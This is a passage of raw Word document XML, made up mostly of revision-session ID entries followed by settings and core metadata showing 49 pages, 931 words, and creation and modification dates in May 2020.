    <w:rsid w:val="00406C39"/>
    <w:rsid w:val="00431F2F"/>
    <w:rsid w:val="00445CE0"/>
    <w:rsid w:val="00481C4D"/>
    <w:rsid w:val="0049607F"/>
    <w:rsid w:val="004977EC"/>
    <w:rsid w:val="004C361A"/>
    <w:rsid w:val="004F14AF"/>
    <w:rsid w:val="005414AD"/>
    <w:rsid w:val="005528D2"/>
    <w:rsid w:val="0055309C"/>
    <w:rsid w:val="005C7A01"/>
    <w:rsid w:val="006024B8"/>
    <w:rsid w:val="00620C5F"/>
    <w:rsid w:val="0063741B"/>
    <w:rsid w:val="0067047B"/>
    <w:rsid w:val="006A3772"/>
    <w:rsid w:val="006A513F"/>
    <w:rsid w:val="006D089D"/>
    <w:rsid w:val="007355EF"/>
    <w:rsid w:val="0073579E"/>
    <w:rsid w:val="00880F83"/>
    <w:rsid w:val="008923DA"/>
    <w:rsid w:val="008934DF"/>
    <w:rsid w:val="008A3499"/>
    <w:rsid w:val="008A5B35"/>
    <w:rsid w:val="008E3DA6"/>
    <w:rsid w:val="0098105B"/>
    <w:rsid w:val="009A285A"/>
    <w:rsid w:val="009B1B3A"/>
    <w:rsid w:val="009C0B52"/>
    <w:rsid w:val="009E47A6"/>
    <w:rsid w:val="00A03AF2"/>
    <w:rsid w:val="00A63200"/>
    <w:rsid w:val="00A84AE5"/>
    <w:rsid w:val="00A9417B"/>
    <w:rsid w:val="00AA17B9"/>
    <w:rsid w:val="00AF2F3F"/>
    <w:rsid w:val="00B562AB"/>
    <w:rsid w:val="00B75DFD"/>
    <w:rsid w:val="00B83E17"/>
    <w:rsid w:val="00BA39CE"/>
    <w:rsid w:val="00BE2386"/>
    <w:rsid w:val="00C12AB4"/>
    <w:rsid w:val="00C24029"/>
    <w:rsid w:val="00C24288"/>
    <w:rsid w:val="00C24E1B"/>
    <w:rsid w:val="00C4254D"/>
    <w:rsid w:val="00C43880"/>
    <w:rsid w:val="00C75C6E"/>
    <w:rsid w:val="00CF6259"/>
    <w:rsid w:val="00D20660"/>
    <w:rsid w:val="00D50A5A"/>
    <w:rsid w:val="00D64D5E"/>
    <w:rsid w:val="00D91B1E"/>
    <w:rsid w:val="00DA7454"/>
    <w:rsid w:val="00DC13BD"/>
    <w:rsid w:val="00DF04F9"/>
    <w:rsid w:val="00E4662F"/>
    <w:rsid w:val="00EC7190"/>
    <w:rsid w:val="00F75998"/>
    <w:rsid w:val="00FB3BB3"/>
    <w:rsid w:val="00FC2146"/>
    <w:rsid w:val="00FD2C99"/>
    <w:rsid w:val="00FD6C6C"/>
    <w:rsid w:val="00FE0A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27430"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC58E18E-5CA6-4D1B-AAF7-0F6EFE31D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6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344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TotalTime>
  <Pages>49</Pages>
  <Words>931</Words>
  <Characters>5311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67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-04T15:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-05T13:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>